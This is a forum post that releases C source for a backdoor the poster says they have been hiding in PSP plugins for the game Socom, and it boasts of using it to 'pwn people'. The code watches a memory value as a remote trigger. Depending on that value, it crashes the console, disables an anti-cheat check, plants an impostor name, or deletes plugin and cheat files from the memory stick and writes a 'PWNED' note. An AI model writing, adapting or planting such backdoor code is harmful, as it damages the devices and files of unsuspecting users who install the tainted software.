Socom Backdoor! Control Codes Released
Hey since we are posting up our goodies tonight and smokin just gave away his fun stuff, i figure its time to share the wealth, this is a block of code i've been putting into sh*t. If you are smart enough to figure out what it does then you are smart enough to be able to use it :P Lets just say theres some very very mean features about it, figure out how to use it and you will pwn people. good luck!
Don't bother asking what this does its obvious, and if it's not obvious then you're to stupid to use it there for you don't deserve it this is how i will make you work for it. Who ever is the 1st to crack its secret WINS!
PS IV.SHOOTER IS THE KEY TO THE PUZZLE.Code:void control(){ unsigned int *watchdog1=(unsigned int*) (0x00F982A4+0x08800000); void case1(){ *FTB2personapointer=0xFFFFFFFF; } void case2(){ unsigned int *network35=(unsigned int*) (0x0037BA50+0x08800000); *network35=0x14400013; } void case3(){ unsigned int *disable=(unsigned int*) (0x00804F04+0x08800000); unsigned int *imposter01=(unsigned int*) (0x00491D10+0x08800000); unsigned int *imposter02=(unsigned int*) (0x00491D14+0x08800000); unsigned int *imposter03=(unsigned int*) (0x00491D18+0x08800000); unsigned int *imposter04=(unsigned int*) (0x00491D1C+0x08800000); unsigned int *imposter05=(unsigned int*) (0x00491D20+0x08800000); *disable=0xFFFFFFFF; *imposter01=0x746F6F62; *imposter02=0x21656D20; *imposter03=0x67616620; *imposter04=0x73746F67; *imposter05=0x00000021; } void case4(){ sceIoRemove("ms0:/seplugins/nitePR/ucus-98645.txt"); sceIoRemove("ms0:/seplugins/nitePR/prx/pspBricker.prx"); sceIoRemove("ms0:/seplugins/nitePR/prx/hijack.prx"); sceIoRemove("ms0:/seplugins/nitePR.prx"); sceIoRemove("ms0:/seplugins/hijack.prx"); sceIoRemove("ms0:/seplugins/antiboot.prx"); sceIoRemove("ms0:/seplugins/pspBricker.prx"); sceIoRemove("ms0:/seplugins/pspBricker.txt"); int fd; fd=sceIoOpen("ms0:/PWNED.txt", PSP_O_WRONLY | PSP_O_CREAT | PSP_O_APPEND, 0777); sceIoWrite(fd, "Your Database Has Been Removed.", 31); sceIoWrite(fd, "NitePR, Bricker, Antiboot, Hijack Removed.", 42); sceIoWrite(fd, "All your base R belong to US.", 29); sceIoClose(fd); } //if watchdog addy changes do case switch(*watchdog1){ // {*_} crash psp case 0x7D5F2A7B: case1(); break; // {**] disable anti35 case 0x7D2A2A7B: case2(); break; // [*!} new Imposter case 0x7D212A7B: case3(); break; // {*@} remove nitePR and remove cheat database case 0x7D402A7B: case4(); break; } }